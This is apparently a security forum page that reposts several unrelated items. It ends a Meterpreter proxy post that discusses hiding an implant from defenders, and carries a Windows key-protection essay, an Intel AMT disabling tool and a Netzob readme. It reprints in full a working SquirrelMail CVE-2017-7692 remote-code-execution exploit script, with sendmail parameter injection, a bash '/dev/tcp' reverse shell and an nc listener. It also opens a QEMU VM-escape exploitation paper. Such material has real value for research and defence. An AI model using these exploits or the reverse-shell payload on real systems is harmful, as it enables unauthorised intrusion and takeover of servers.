On the other hand, we saw that Windows tries to use the proxy configurations in order (according to the precedence we already discussed). However, it seems that once a proxy has been obtained (e.g. scenario #1), if it does not work, Windows does not try to use another available option. We also saw that Internet Explorer and Firefox, when configured to "Use system proxy settings", do not behave in the same way when looking for a proxy. Finally, we saw that in both cases, when a proxy is reachable but does not provide Internet access for whatever reason (e.g. the Internet link died), they will not try a different one that might work.

Considering the results, we do have the necessary API functions to evaluate all the proxy configurations and even test them to see whether they actually allow access to an Internet resource. Therefore, with a few more lines of code we could make our APT solution more robust so that it keeps working even under these kinds of scenarios. However, I have to admit that these are very uncommon scenarios, where a client workstation has more than one proxy configured, and I can't really see how an administrator would end up with this kind of mess. On the other hand, I'm not completely sure it would be a good idea to make our APT work even when IE is not working: what if a host that is believed to be disconnected from the Internet suddenly starts showing Internet activity by cleverly using the available proxies? That may look strange to a blue team, perhaps.

As a final conclusion, I would say that making our APT solution as robust as IE would be enough to make it work in most cases: if IE is able to reach the Internet, then the APT will be as well.

References

- Auto Proxy: https://blogs.msdn.microsoft.com/askie/2014/02/07/optimizing-performance-with-automatic-proxyconfiguration-scripts-pac/
- Windows Web Proxy Configuration: https://blogs.msdn.microsoft.com/ieinternals/2013/10/11/understanding-web-proxy-configuration/
- Meterpreter building: https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter
- Meterpreter WinHTTP source code: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/server/win/server_transport_winhttp.c
- Meterpreter common.h source code: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/common/common.h
- Sysinternals DebugView: https://technet.microsoft.com/en-us/sysinternals/debugview.aspx
- WinHTTP vs WinInet: https://github.com/rapid7/metasploit-framework/wiki/The-ins-and-outs-of-HTTP-and-HTTPS-communications-in-Meterpreter-and-Metasploit-Stagers
- Metasploit bug report: https://github.com/rapid7/metasploit-payloads/issues/151
- WinHTTP Sample Code: http://code.msdn.microsoft.com/windowsdesktop/WinHTTP-proxy-sample-eea13d0c

Source: https://medium.com/@br4nsh/a-meterpreter-and-windows-proxy-case-4af2b866f4a1
    1 point
10. How to keep a secret in Windows

Protecting cryptographic keys is always a balancing act. For the keys to be useful they need to be readily accessible and recoverable, and their use needs to be sufficiently performant so that it does not slow your application down. On the other hand, the more accessible and recoverable they are, the less secure the keys are.

In Windows, we tried to build a number of systems to help with these problems. The most basic was the Windows Data Protection API (DPAPI). It was our answer to the question: "What secret do I use to encrypt a secret?" It can be thought of as a policy or DRM system since, as a practical matter, it is largely a speed bump for privileged users who want access to the data it protects. Over the years there have been many tools that leverage the user's permissions to decrypt DPAPI-protected data; one of the most recent was DPAPIPick. Even though I have framed this problem in the context of Windows, here is a neat paper on this broad problem called "Playing hide and seek with stored keys".

The next level of key protection offered by Windows is a policy mechanism called "non-exportable keys", which is primarily a consumer of DPAPI. Basically, when you generate the key you ask Windows to deny its export; as a result the key gets a flag set on it that cannot, via the API, be changed. The key and this flag are then protected with DPAPI. Even though this is just a policy enforced with a DRM-like system, it does serve its purpose of reducing the casual copying of keys. Again, over the years there have been numerous tools that have leveraged the user's permissions to access these keys; one of the more recent I remember was called Jailbreak (https://github.com/iSECPartners/jailbreak-Windows). There have also been a lot of wonderful walkthroughs of how these systems work, for example this nice NCC Group presentation.

The problem with all of the above mechanisms is that they are largely designed to protect keys from their rightful user. In other words, even when these systems work, the key usually ends up being loaded into memory in the clear, where it is accessible to the user and their applications. This is important to understand since the large majority of applications that use cryptography in Windows do so in the context of the user.

A better solution for protecting keys from the user is putting them behind protocol-specific APIs that "remote" the operation to a process in another user space. We would call this process isolation, and the best example of this in Windows is SCHANNEL. SCHANNEL is the TLS implementation in Windows; prior to Windows 2003 the keys used by SCHANNEL were loaded into the memory of the application calling it. In 2003 we moved the cryptographic operations into the Local Security Authority Subsystem Service (LSASS), which is essentially Ring 0 in Windows. By moving the keys into this process we help protect them from user-mode processes (though we don't prevent access) while still enabling applications to do TLS sessions. This comes at an expense: you now need to marshal data to and from user mode and LSASS, which hurts performance. [Nasko, a former SCHANNEL developer, tells me he believes it was the synchronous nature of SSPI that hurt the performance the most; this is likely, but the net result is the same.] In fact, this change was cited as one of the major reasons IIS was so much slower than Apache for "real workloads" on Windows Server 2003. It is worth noting that those of us involved in the decision to make this change surely felt vindicated when Heartbleed occurred.
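Coming back to DPAPI for a moment: for readers who have never used it, a minimal sketch of protecting and unprotecting a blob with CryptProtectData/CryptUnprotectData through ctypes looks roughly like the following. This is an illustration, not code from the original post; note that any code running in the same user context can call CryptUnprotectData just as easily, which is exactly the limitation discussed above.

import ctypes
from ctypes import wintypes

crypt32  = ctypes.windll.crypt32
kernel32 = ctypes.windll.kernel32

class DATA_BLOB(ctypes.Structure):
    _fields_ = [("cbData", wintypes.DWORD),
                ("pbData", ctypes.POINTER(ctypes.c_char))]

def _make_blob(data: bytes) -> DATA_BLOB:
    buf = ctypes.create_string_buffer(data, len(data))
    return DATA_BLOB(len(data), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))

def _blob_to_bytes(blob: DATA_BLOB) -> bytes:
    out = ctypes.string_at(blob.pbData, blob.cbData)
    kernel32.LocalFree(blob.pbData)        # CryptProtectData output is LocalAlloc'd
    return out

def dpapi_protect(secret: bytes) -> bytes:
    blob_in, blob_out = _make_blob(secret), DATA_BLOB()
    if not crypt32.CryptProtectData(ctypes.byref(blob_in), "demo", None, None,
                                    None, 0, ctypes.byref(blob_out)):
        raise ctypes.WinError()
    return _blob_to_bytes(blob_out)

def dpapi_unprotect(ciphertext: bytes) -> bytes:
    blob_in, blob_out = _make_blob(ciphertext), DATA_BLOB()
    if not crypt32.CryptUnprotectData(ctypes.byref(blob_in), None, None, None,
                                      None, 0, ctypes.byref(blob_out)):
        raise ctypes.WinError()
    return _blob_to_bytes(blob_out)

if __name__ == "__main__":
    enc = dpapi_protect(b"my TLS private key")
    print(dpapi_unprotect(enc))   # anything running as this user can do the same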
Process isolation is not perfect either: again, if you are in Ring 0 you can still access the cryptographic keys. When you want to address this risk, you remote the cryptographic operation to a dedicated system managed by a set of users that does not include the user. This could be a cryptographic service remoted over TCP/IP (like Microsoft KeyVault or Google Cloud Key Manager), or maybe a Hardware Security Module (HSM) or smart card. This has all of the performance problems of basic process isolation, but worse, because the transition from user mode to the protected service is even "further away" or more bandwidth constrained (smart cards often run at 115k bps or slower). In Windows, for TLS, this is accomplished through providers to CNG, CryptoAPI CSPs, and smart card minidrivers. These solutions are usually closed source, and some of the security issues I have seen in them over the years are appalling, but despite their failings there is a lot of value in getting keys out of the user space, and this is the most effective way of doing that. These devices also provide, to varying degrees, protection from physical, timing and other more advanced attacks.

Well, that is my summary of the core key protection schemes available in Windows. Most operating systems have similar mechanisms; Windows just has superior documentation and has answers to each of these problems in "one logical place" rather than in many different libraries from different authors.

Ryan

Source: https://unmitigatedrisk.com/?p=586
    1 point
11. Disable Intel AMT

Tool to disable Intel AMT on Windows. Runs on both x86 and x64 Windows operating systems.

Download: DisableAMT.exe, DisableAMT.zip

What?

On 02 May 2017, Embedi discovered "an escalation of privilege vulnerability in Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology versions firmware versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 that can allow an unprivileged attacker to gain control of the manageability features provided by these products".

Read also: Intel Active Management Technology, Intel Small Business Technology, and Intel Standard Manageability Escalation of Privilege
Assigned CVE: CVE-2017-5689

Wait, what?

Your machine may be vulnerable to hackers.

How do I know if I'm affected?

If you see any of these stickers or badges on your laptop, notebook or desktop, you are likely affected by this. You may want to read: How To Find Intel® vPro™ Technology Based PCs

Usage

Simple. Download and run DisableAMT.exe, and it will do the work for you. This is based on the instructions provided by the INTEL-SA-00075 Mitigation Guide. The tool runs quickly and, when done, presents you with the following screen:

Type Y or N depending on whether you would also like to automatically disable (by renaming) the actual LMS.exe (Intel Local Management Service) binary. When finished, a logfile will open up. Reboot your machine at this point. That's all!

Details about the tool

The tool is simply written in batch and has the necessary components inside to unconfigure AMT. The batch file was compiled to an executable using the free version of Quick Batch File Compiler, and subsequently packed with UPX to reduce file size. Additionally, ACUConfig.exe and ACU.dll from Intel's Setup and Configuration Software package are included. You may find all these files in the 'src' folder.

Please find hashes below:

DisableAMT.exe
  MD5:    3a7f3c23ea25279084f0245dfa7ecb21
  SHA1:   383fc99f149c4aec3536ed5370dc4b07f7f93028
  SHA256: f0cecef7f5d1b8be8feeddf83c71892bf9dd6e28b325f88e0c071c6be34b8c19

DisableAMT.zip
  MD5:    0458d8e23a527e74b567d7fa4b342fec
  SHA1:   f7b73115bfbacaea32da833deaf7c1187d1bfc40
  SHA256: 143ffd107c3861a95e829d26baeb30316ded89bb494e74467bcfb8219f895c3b

DisableAMT.bat
  MD5:    c00bc5a37cb7a66f53aec5e502116a5c
  SHA1:   51ca8a7c3f5a81a31115618af4245df13aa39a90
  SHA256: a58c56c61ba7eae6d0db27b2bc02e05444befca885b12d84948427fff544378a

ACUConfig.exe
  MD5:    4117b39f1e6b599f758d59f34dc7642c
  SHA1:   7595bc7a97e7ddab65f210775e465aa6a87df4fd
  SHA256: 475e242953ab8e667aa607a4a7966433f111f8adbb3f88d8b21052b4c38088f7

ACU.dll
  MD5:    a98f9acb2059eff917b13aa7c1158150
  SHA1:   d869310f28fce485da0c099f7df349c82a005f30
  SHA256: c569d9ce5024bb5b430bab696f2d276cfdc068018a84703b48e6d74a13dadfd7

Is there an easier way to do this? Probably.

Link: https://github.com/bartblaze/Disable-Intel-AMT
    1 point
12. Netzob : Protocol Reverse Engineering, Modeling and Fuzzing

About

Welcome to the official repository of Netzob. Netzob is a tool that can be used to reverse engineer, model and fuzz communication protocols. It is made of two components:

- netzob: a Python project that exposes all the features of Netzob (except the GUI), which you can import into your own tool or use from the CLI;
- netzob_web: a graphical interface that leverages web technologies.

Source code, documentation and resources are available for each component; please visit their dedicated directories.

General Information

- Email: contact@netzob.org
- Mailing list: two lists are available; use the SYMPA web interface to register.
- IRC: you can hang out with us on Freenode's IRC channel #netzob @ freenode.org.
- Twitter: follow Netzob's official account (@Netzob)

Authors, Contributors and Sponsors

See the top distribution file AUTHORS.txt in each component for the detailed and updated list of their authors, contributors and sponsors.

Extra

Zoby, the official mascot of Netzob.

Link: https://github.com/netzob/netzob
    1 point
13. Published on 3 May 2017

We take a look into the malware Gatak, which uses WriteProcessMemory and CreateRemoteThread to inject code into rundll32.exe. Many thanks to @_jsoo_ for providing the sample!

Follow me on Twitter: https://twitter.com/struppigel
Gatak VirusBtn article: https://www.virusbulletin.com/virusbu...
Sample: https://www.hybrid-analysis.com/sampl...
API Monitor: http://www.rohitab.com/apimonitor
Process Explorer: https://technet.microsoft.com/en-us/s...
x64dbg: http://x64dbg.com/
HxD: https://mh-nexus.de/en/hxd/
    1 point
  14. #!/bin/bash # int='\033[94m __ __ __ __ __ / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/ SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) SquirrelMail_RCE_exploit.sh (ver. 1.0) Discovered and coded by Dawid Golunski (@dawid_golunski) https://legalhackers.com ExploitBox project: https://ExploitBox.io \033[0m' # Quick and messy PoC for SquirrelMail webmail application. # It contains payloads for 2 vectors: # * File Write # * RCE # It requires user credentials and that SquirrelMail uses # Sendmail method as email delivery transport # # # Full advisory URL: # https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html # Exploit URL: # https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh # # Tested on: # Ubuntu 16.04 # squirrelmail package version: # 2:1.4.23~svn20120406-2ubuntu1.16.04.1 # # Disclaimer: # For testing purposes only # # # ----------------------------------------------------------------- # # Interested in vulns/exploitation? # Stay tuned for my new project - ExploitBox # # .;lc' # .,cdkkOOOko;. # .,lxxkkkkOOOO000Ol' # .':oxxxxxkkkkOOOO0000KK0x:' # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. # '';ldxxxxxdc,. ,oOXXXNNNXd;,. # .ddc;,,:c;. ,c: .cxxc:;:ox: # .dxxxxo, ., ,kMMM0:. ., .lxxxxx: # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: # .dxxxxxdl;. ., .. .;cdxxxxxx: # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. # .':oxxxxxxxxx.ckkkkkkkkxl,. # .,cdxxxxx.ckkkkkxc. # .':odx.ckxl,. # .,.'. # # https://ExploitBox.io # # https://twitter.com/Exploit_Box # # ----------------------------------------------------------------- sqspool="/var/spool/squirrelmail/attach/" echo -e "$int" #echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n" #echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n" #echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n" # Base URL if [ $# -ne 1 ]; then echo -e "Usage: \n$0 SquirrelMail_URL" echo -e "Example: \n$0 http://target/squirrelmail/ \n" exit 2 fi URL="$1" # Log in echo -e "\n[*] Enter SquirrelMail user credentials" read -p "user: " squser read -sp "pass: " sqpass echo -e "\n\n[*] Logging in to SquirrelMail at $URL" curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect if [ $? 
-eq 0 ]; then echo "Invalid creds" exit 2 fi sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" # Prepare Sendmail cnf # # * The config will launch php via the following stanza: # # Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, # T=DNS/RFC822/X-Unix, # A=php -- $u $h ${client_addr} # wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf # Upload config echo -e "\n\n[*] Uploading Sendmail config" token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`" if [ ${#attachid} -lt 32 ]; then echo "Something went wrong. Failed to upload the sendmail file." exit 2 fi # Create Sendmail cmd string according to selected payload echo -e "\n\n[?] Select payload\n" # SELECT PAYLOAD echo "1 - File write (into /tmp/sqpoc)" echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)" echo read -p "[1-2] " pchoice case $pchoice in 1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc" ;; 2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid" ;; esac if [ $pchoice -eq 2 ]; then echo read -p "Reverese shell IP: " reverse_ip read -p "Reverese shell PORT: " reverse_port fi # Reverse shell code phprevsh=" <?php \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\"; file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd); system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\"); ?>" # Set sendmail params in user settings echo -e "\n[*] Injecting Sendmail command parameters" token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null if [ $? -ne 0 ]; then echo "Failed to inject sendmail parameters" exit 2 fi # Send email which triggers the RCE vuln and runs phprevsh echo -e "\n[*] Sending the email to trigger the vuln" (sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \ -d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) & if [ $pchoice -eq 2 ]; then echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port" nc -vv -l -p $reverse_port else echo -e "\n[*] The test file should have been written at /tmp/sqpoc" fi grep -q "302 Found" /tmp/sheaders if [ $? -eq 1 ]; then echo "There was a problem with sending email" exit 2 fi # Done echo -e "\n[*] All done. Exiting" Sursa: https://www.exploit-db.com/exploits/41910/
    1 point
15.

|=-----------------------------------------------------------------------=|
|=----------------------------=[ VM escape ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ QEMU Case Study ]=-------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ Mehdi Talbi ]=---------------------------=|
|=--------------------------=[ Paul Fariello ]=--------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

1 - Introduction
2 - KVM/QEMU Overview
  2.1 - Workspace Environment
  2.2 - QEMU Memory Layout
  2.3 - Address Translation
3 - Memory Leak Exploitation
  3.1 - The Vulnerable Code
  3.2 - Setting up the Card
  3.3 - Exploit
4 - Heap-based Overflow Exploitation
  4.1 - The Vulnerable Code
  4.2 - Setting up the Card
  4.3 - Reversing CRC
  4.4 - Exploit
5 - Putting All Together
  5.1 - RIP Control
  5.2 - Interactive Shell
  5.3 - VM-Escape Exploit
  5.4 - Limitations
6 - Conclusions
7 - Greets
8 - References
9 - Source Code

--[ 1 - Introduction

Virtual machines are nowadays heavily deployed for personal use or within the enterprise segment. Network security vendors use, for instance, different VMs to analyze malware in a controlled and confined environment. A natural question arises: can the malware escape from the VM and execute code on the host machine?

Last year, Jason Geffner from CrowdStrike reported a serious bug in QEMU affecting the virtual floppy drive code that could allow an attacker to escape from the VM [1] to the host. Even if this vulnerability has received considerable attention in the netsec community - probably because it has a dedicated name (VENOM) - it wasn't the first of its kind.

In 2011, Nelson Elhage [2] reported and successfully exploited a vulnerability in QEMU's emulation of PCI device hotplugging. The exploit is available at [3].

Recently, Xu Liu and Shengping Wang, from Qihoo 360, showcased at HITB 2016 a successful exploit on KVM/QEMU. They exploited two vulnerabilities (CVE-2015-5165 and CVE-2015-7504) present in two different network card device emulator models, namely RTL8139 and PCNET. During their presentation, they outlined the main steps towards code execution on the host machine but didn't provide any exploit nor the technical details to reproduce it.

In this paper, we provide an in-depth analysis of CVE-2015-5165 (a memory-leak vulnerability) and CVE-2015-7504 (a heap-based overflow vulnerability), along with working exploits. The combination of these two exploits allows one to break out from a VM and execute code on the target host. We discuss the technical details required to exploit the vulnerabilities in QEMU's network card device emulation, and provide generic techniques that could be re-used to exploit future bugs in QEMU - for instance an interactive bindshell that leverages shared memory areas and shared code.

--[ 2 - KVM/QEMU Overview

KVM (Kernel-based Virtual Machine) is a kernel module that provides a full virtualization infrastructure for user space programs. It allows one to run multiple virtual machines running unmodified Linux or Windows images. The user space component of KVM is included in mainline QEMU (Quick Emulator), which notably handles device emulation.
----[ 2.1 - Workspace Environment In effort to make things easier to those who want to use the sample code given throughout this paper, we provide here the main steps to reproduce our development environment. Since the vulnerabilities we are targeting has been already patched, we need to checkout the source for QEMU repository and switch to the commit that precedes the fix for these vulnerabilities. Then, we configure QEMU only for target x86_64 and enable debug: $ git clone git://git.qemu-project.org/qemu.git $ cd qemu $ git checkout bd80b59 $ mkdir -p bin/debug/native $ cd bin/debug/native $ ../../../configure --target-list=x86_64-softmmu --enable-debug \ $ --disable-werror $ make In our testing environment, we build QEMU using version 4.9.2 of Gcc. For the rest, we assume that the reader has already a Linux x86_64 image that could be run with the following command line: $ ./qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \ $ -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \ $ -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \ $ -drive file=<path_to_image>,format=qcow2,if=ide,cache=writeback We allocate 2GB of memory and create two network interface cards: RTL8139 and PCNET. We are running QEMU on a Debian 7 running a 3.16 kernel on x_86_64 architecture. ----[ 2.2 - QEMU Memory Layout The physical memory allocated for the guest is actually a mmapp'ed private region in the virtual address space of QEMU. It's important to note that the PROT_EXEC flag is not enabled while allocating the physical memory of the guest. The following figure illustrates how the guest's memory and host's memory cohabits. Guest' processes +--------------------+ Virtual addr space | | +--------------------+ | | \__ Page Table \__ \ \ | | Guest kernel +----+--------------------+----------------+ Guest's phy. memory | | | | +----+--------------------+----------------+ | | \__ \__ \ \ | QEMU process | +----+------------------------------------------+ Virtual addr space | | | +----+------------------------------------------+ | | \__ Page Table \__ \ \ | | +----+-----------------------------------------------++ Physical memory | | || +----+-----------------------------------------------++ Additionaly, QEMU reserves a memory region for BIOS and ROM. These mappings are available in QEMU's maps file: 7f1824ecf000-7f1828000000 rw-p 00000000 00:00 0 7f1828000000-7f18a8000000 rw-p 00000000 00:00 0 [2 GB of RAM] 7f18a8000000-7f18a8992000 rw-p 00000000 00:00 0 7f18a8992000-7f18ac000000 ---p 00000000 00:00 0 7f18b5016000-7f18b501d000 r-xp 00000000 fd:00 262489 [first shared lib] 7f18b501d000-7f18b521c000 ---p 00007000 fd:00 262489 ... 7f18b521c000-7f18b521d000 r--p 00006000 fd:00 262489 ... 7f18b521d000-7f18b521e000 rw-p 00007000 fd:00 262489 ... ... [more shared libs] 7f18bc01c000-7f18bc5f4000 r-xp 00000000 fd:01 30022647 [qemu-system-x86_64] 7f18bc7f3000-7f18bc8c1000 r--p 005d7000 fd:01 30022647 ... 7f18bc8c1000-7f18bc943000 rw-p 006a5000 fd:01 30022647 ... 7f18bd328000-7f18becdd000 rw-p 00000000 00:00 0 [heap] 7ffded947000-7ffded968000 rw-p 00000000 00:00 0 [stack] 7ffded968000-7ffded96a000 r-xp 00000000 00:00 0 [vdso] 7ffded96a000-7ffded96c000 r--p 00000000 00:00 0 [vvar] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] A more detailed explanation of memory management in virtualized environment can be found at [4]. ----[ 2.3 - Address Translation Within QEMU there exist two translation layers: - From a guest virtual address to guest physical address. 
In our exploit, we need to configure network card devices that require DMA access. For example, we need to provide the physical address of Tx/Rx buffers to correctly configure the network card devices. - From a guest physical address to QEMU's virtual address space. In our exploit, we need to inject fake structures and get their precise address in QEMU's virtual address space. On x64 systems, a virtual address is made of a page offset (bits 0-11) and a page number. On linux systems, the pagemap file enables userspace process with CAP_SYS_ADMIN privileges to find out which physical frame each virtual page is mapped to. The pagemap file contains for each virtual page a 64-bit value well-documented in kernel.org [5]: - Bits 0-54 : physical frame number if present. - Bit 55 : page table entry is soft-dirty. - Bit 56 : page exclusively mapped. - Bits 57-60 : zero - Bit 61 : page is file-page or shared-anon. - Bit 62 : page is swapped. - Bit 63 : page is present. To convert a virtual address to a physical one, we rely on Nelson Elhage's code [3]. The following program allocates a buffer, fills it with the string "Where am I?" and prints its physical address: ---[ mmu.c ]--- #include <stdio.h> #include <string.h> #include <stdint.h> #include <stdlib.h> #include <fcntl.h> #include <assert.h> #include <inttypes.h> #define PAGE_SHIFT 12 #define PAGE_SIZE (1 << PAGE_SHIFT) #define PFN_PRESENT (1ull << 63) #define PFN_PFN ((1ull << 55) - 1) int fd; uint32_t page_offset(uint32_t addr) { return addr & ((1 << PAGE_SHIFT) - 1); } uint64_t gva_to_gfn(void *addr) { uint64_t pme, gfn; size_t offset; offset = ((uintptr_t)addr >> 9) & ~7; lseek(fd, offset, SEEK_SET); read(fd, &pme, 8); if (!(pme & PFN_PRESENT)) return -1; gfn = pme & PFN_PFN; return gfn; } uint64_t gva_to_gpa(void *addr) { uint64_t gfn = gva_to_gfn(addr); assert(gfn != -1); return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr); } int main() { uint8_t *ptr; uint64_t ptr_mem; fd = open("/proc/self/pagemap", O_RDONLY); if (fd < 0) { perror("open"); exit(1); } ptr = malloc(256); strcpy(ptr, "Where am I?"); printf("%s\n", ptr); ptr_mem = gva_to_gpa(ptr); printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem); getchar(); return 0; } If we run the above code inside the guest and attach gdb to the QEMU process, we can see that our buffer is located within the physical address space allocated for the guest. More precisely, we note that the outputted address is actually an offset from the base address of the guest physical memory: root@debian:~# ./mmu Where am I? Your physical address is at 0x78b0d010 (gdb) info proc mappings process 14791 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x7fc314000000 0x7fc314022000 0x22000 0x0 0x7fc314022000 0x7fc318000000 0x3fde000 0x0 0x7fc319dde000 0x7fc31c000000 0x2222000 0x0 0x7fc31c000000 0x7fc39c000000 0x80000000 0x0 ... (gdb) x/s 0x7fc31c000000 + 0x78b0d010 0x7fc394b0d010: "Where am I?" --[ 3 - Memory Leak Exploitation In the following, we will exploit CVE-2015-5165 - a memory leak vulnerability that affects the RTL8139 network card device emulator - in order to reconstruct the memory layout of QEMU. More precisely, we need to leak (i) the base address of the .text segment in order to build our shellcode and (ii) the base address of the physical memory allocated for the guest in order to be able to get the precise address of some injected dummy structures. ----[ 3.1 - The vulnerable Code The REALTEK network card supports two receive/transmit operation modes: C mode and C+ mode. 
When the card is set up to use C+, the NIC device emulator miscalculates the length of IP packet data and ends up sending more data than actually available in the packet. The vulnerability is present in the rtl8139_cplus_transmit_one function from hw/net/rtl8139.c: /* ip packet header */ ip_header *ip = NULL; int hlen = 0; uint8_t ip_protocol = 0; uint16_t ip_data_len = 0; uint8_t *eth_payload_data = NULL; size_t eth_payload_len = 0; int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12)); if (proto == ETH_P_IP) { DPRINTF("+++ C+ mode has IP packet\n"); /* not aligned */ eth_payload_data = saved_buffer + ETH_HLEN; eth_payload_len = saved_size - ETH_HLEN; ip = (ip_header*)eth_payload_data; if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) { DPRINTF("+++ C+ mode packet has bad IP version %d " "expected %d\n", IP_HEADER_VERSION(ip), IP_HEADER_VERSION_4); ip = NULL; } else { hlen = IP_HEADER_LENGTH(ip); ip_protocol = ip->ip_p; ip_data_len = be16_to_cpu(ip->ip_len) - hlen; } } The IP header contains two fields hlen and ip->ip_len that represent the length of the IP header (20 bytes considering a packet without options) and the total length of the packet including the ip header, respectively. As shown at the end of the snippet of code given below, there is no check to ensure that ip->ip_len >= hlen while computing the length of IP data (ip_data_len). As the ip_data_len field is encoded as unsigned short, this leads to sending more data than actually available in the transmit buffer. More precisely, the ip_data_len is later used to compute the length of TCP data that are copied - chunk by chunk if the data exceeds the size of the MTU - into a malloced buffer: int tcp_data_len = ip_data_len - tcp_hlen; int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen; int is_last_frame = 0; for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size) { uint16_t chunk_size = tcp_chunk_size; /* check if this is the last frame */ if (tcp_send_offset + tcp_chunk_size >= tcp_data_len) { is_last_frame = 1; chunk_size = tcp_data_len - tcp_send_offset; } memcpy(data_to_checksum, saved_ip_header + 12, 8); if (tcp_send_offset) { memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size); } /* more code follows */ } So, if we forge a malformed packet with a corrupted length size (e.g. ip->ip_len = hlen - 1), then we can leak approximatively 64 KB from QEMU's heap memory. Instead of sending a single packet, the network card device emulator will end up by sending 43 fragmented packets. ----[ 3.2 - Setting up the Card In order to send our malformed packet and read leaked data, we need to configure first Rx and Tx descriptors buffers on the card, and set up some flags so that our packet flows through the vulnerable code path. The figure below shows the RTL8139 registers. We will not detail all of them but only those which are relevant to our exploit: +---------------------------+----------------------------+ 0x00 | MAC0 | MAR0 | +---------------------------+----------------------------+ 0x10 | TxStatus0 | +--------------------------------------------------------+ 0x20 | TxAddr0 | +-------------------+-------+----------------------------+ 0x30 | RxBuf |ChipCmd| | +-------------+------+------+----------------------------+ 0x40 | TxConfig | RxConfig | ... | +-------------+-------------+----------------------------+ | | | skipping irrelevant registers | | | +---------------------------+--+------+------------------+ 0xd0 | ... | |TxPoll| ... 
